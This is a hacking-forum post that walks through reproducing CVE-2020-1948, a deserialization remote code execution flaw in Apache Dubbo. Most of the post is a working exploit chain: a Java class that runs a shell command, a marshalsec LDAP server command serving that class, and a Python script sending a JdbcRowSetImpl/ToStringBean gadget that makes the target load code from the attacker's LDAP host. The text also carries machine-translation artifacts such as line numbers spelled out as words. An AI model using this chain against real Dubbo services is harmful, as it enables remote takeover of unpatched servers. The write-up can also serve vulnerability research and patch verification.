Jump to content

Title: Apache Dubbo Provider Deserialization Vulnerability (CVE-2020-1948)

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Apache Dubbo Provider反序列化漏洞(CVE-2020-1948)

Apache Dubbo Provider has a deserialization vulnerability. Attackers can send unrecognized service names or method names and some malicious parameter payloads through RPC requests. When malicious parameters are deserialized, remote code execution can be caused.

影响版本

Dubbo 2.7.0 - 2.7.6

Dubbo 2.6.0 - 2.6.7

Dubbo 2.5.x (officially no longer maintained)

环境搭建

Reproduction environment:

MAC

Dubbo 2.5.9

JDK 8U20

Environment download address:

https://gist.github.com/OneSourceCat/01277dceba635eefbc010af36d3704d7

Import the downloaded environment into IDEA:

20200702085332.png-water_print

Install zookeeper under mac:

1

2

brew install zookeeper

brew services start zookeeper

Modify the Provider.java file and specify how Spring loads the configuration file:

ClassPathXmlApplicationContext context=new ClassPathXmlApplicationContext('file:/Volumes/MacOS/WorkSpace/JAVA/dubbo-poc/DubboModules/src/resources/provider.xml') ;

Modify the Consumer.java file and specify how Spring loads the configuration file:

ClassPathXmlApplicationContext context=new ClassPathXmlApplicationContext('file:/Volumes/MacOS/WorkSpace/JAVA/dubbo-poc/dubboconsumer/resources/consumer.xml') ;

Run Provider.java:

20200702085823.png-water_print

Compile ExportObject.java

1

2

3

4

5

6

7

8

9

10

11

12

13

public class ExportObject {

public ExportObject() throws Exception {

try {

java.lang.Runtime.getRuntime().exec('open /System/Applications/Calculator.app');

} catch (java.io.IOException e) {

e.printStackTrace();

}

}

public static void main(String[] args) throws Exception {

ExportObject e=new ExportObject();

}

}

1

javac ExportObject.java

Note: You must compile with the same version or lower version of JDK here, otherwise the deserialization will fail.

Start the LDAP service:

1

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://127.0.0.1:8000/#ExportObject' 8087

20200702090230.png-water_print

Start HTTP service:

1

python3 -m http.server

20200702090353.png-water_print

Run consumer.java and deserialize:

20200702090516.png-water_print

It was found that the calculator could be successfully popped up.

Test with poc:

pip install dubbo

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

from dubbo.codec.hessian2 import Decoder,new_object

from dubbo.client import DubboClient

client=DubboClient('127.0.0.1', 20881)

JdbcRowSetImpl=new_object(

'com.sun.rowset.JdbcRowSetImpl',

dataSource='ldap://127.0.0.1:8087/#ExportObject',

strMatchColumns=['foo']

)

JdbcRowSetImplClass=new_object(

'java.lang.Class',

name='com.sun.rowset.JdbcRowSetImpl',

)

toStringBean=new_object(

'com.rometools.rome.feed.impl.ToStringBean',

beanClass=JdbcRowSetImplClass,

obj=JdbcRowSetImpl

)

resp=client.send_request_and_return_response(

service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',

method_name='rce',

args=[toStringBean])

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.